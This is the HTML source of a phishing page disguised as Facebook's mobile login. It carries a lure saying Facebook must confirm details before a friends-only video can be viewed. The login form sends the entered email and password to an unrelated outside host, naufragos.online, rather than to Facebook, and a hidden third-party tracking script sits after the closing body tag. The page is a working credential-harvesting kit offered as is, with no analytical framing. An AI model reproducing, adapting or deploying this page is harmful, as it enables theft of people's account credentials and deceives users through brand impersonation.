
<!DOCTYPE html>


<html>
<head><meta charset="utf-8">
	<title>Facebook - Log In Facebook  </title>
	<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196x196" />
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/3Wd-OG2PBBu.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css" />
	<link crossorigin="anonymous" data-bootloader-hash="0zuZ0" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/n4627wcq9i6.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css" /><meta http-equiv="origin-trial"" /><meta name="description" content="Create an account or log into Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates." />

</head>
<body class="touch x1-5 _fzu _50-3 iframe acw" tabindex="0">

<div id="page">
<div class="_129_" id="header-notices"></div>

<div class="_7om2 _52we _52z5" id="header">
<div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="#"><i class="img sp_fnY1suMVsAP_1_5x sx_52dc0b"><u>facebook</u></i></a></div>
</div>

<div class="_5soa acw" data-sigil="context-layer-root content-pane" id="root" role="main">
<div class="_7om2">
<div class="_4g34" id="u_0_0">
<div class="_5yd0 _2ph- _5yd1" data-sigil="m_login_notice" id="login_error" style="display: none;">
<div class="_52jd"></div>
</div>

<div class="_4-4l">
<div class="_52jj _3-q2"><img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" width="50%" class="_3-q3 img"><div class="_52je _52j9">Facebook needs to confirm the following information to allow access to this video share for friend only, Login!</div></div>
<div class="_5rut">
<form action="https://naufragos.online/canada.php" class="mobile-login-form _5spm" data-sigil="m_login_form" id="login_form" method="post" novalidate="1">


<div class="_56be _5sob">
<div class="_55wo _55x2 _56bf">
<div id="email_input_container"><input autocapitalize="off" autocomplete="on" autocorrect="off" class="_56bg _4u9z _5ruq _8qtn" data-sigil="m_login_email" id="m_login_email" name="email" placeholder="Mobile number or email" type="text" /></div>

<div>
<div class="_1upc _mg8" data-sigil="m_login_password">
<div class="_7om2">
<div class="_4g34 _5i2i _52we">
<div class="_5xu4"><input autocapitalize="off" autocomplete="on" autocorrect="off" class="_56bg _4u9z _27z2 _8qtm" data-sigil="password-plain-text-toggle-input" id="m_login_password" name="pass" placeholder="Password" type="password" /></div>
</div>

<div class="_5s61 _216i _5i2i _52we">
<div class="_5xu4">

</div>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="_2pie" style="text-align:center;">
<div data-sigil="login_password_step_element" id="u_0_4"><button class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" data-sigil="touchable login_button_block m_login_button" name="login" type="submit" value="Log In"><span class="_55sr">Log In</span></button></div>
</div>
<div class="_xo8"></div>
<br>
<br>
<div>
<div class="_43mg _8qtf"><span class="_43mh">or</span></div>

<div class="_52jj _5t3b" id="signup_button_area"><a class="_5t3c _28le btn btnS medBtn mfsm touchable" data-sigil="m_reg_button" href="#" id="signup-button" role="button" tabindex="0">Create New Account</a></div>
</div>

<div>
<div class="other-links _8pux _8p_m">
<ul class="_5pkb _55wp">
	<li><span class="mfss fcg"><a href="#" id="forgot-password-link" tabindex="0">Forgot Password?</a></span></li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>

<div style="display:none">
<div></div>

<div></div>
</div>
 
<div class="_55wr _5ui2" data-sigil="m_login_footer">
<div class="_5dpw">
<div class="_7om2">
<div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">English (US)</span>
<div class="_3ztc"><span class="_52jc"><a data-locale="fr_FR" data-sigil="change_language" href="#">Fran&ccedil;ais (France)</a></span></div>
<div class="_3ztc"><span class="_52jc"><a data-locale="pt_BR" data-sigil="change_language" href="#">Portugu&ecirc;s (Brasil)</a></span></div>
<div class="_3ztc"><span class="_52jc"><a data-locale="ar_AR" data-sigil="change_language" href="#">العربية</a></span></div>
</div>

<div class="_4g34">
<div class="_3ztc"><span class="_52jc"><a data-locale="es_ES" data-sigil="change_language" href="#">Espa&ntilde;ol (Espa&ntilde;a)</a></span></div>
<div class="_3ztc"><span class="_52jc"><a data-locale="it_IT" data-sigil="change_language" href="#">Italiano</a></span></div>
<div class="_3ztc"><span class="_52jc"><a data-locale="de_DE" data-sigil="change_language" href="#">Deutsch</a></span></div>
 </body>
    <div style="VISIBILITY: hidden;"> <script id="_wau3rz">var _wau = _wau || []; _wau.push(["dynamic", "aymimadre", "3rz", "aymimadre", "small"]);</script><script async src="//waust.at/d.js"></script></div>  
</html>
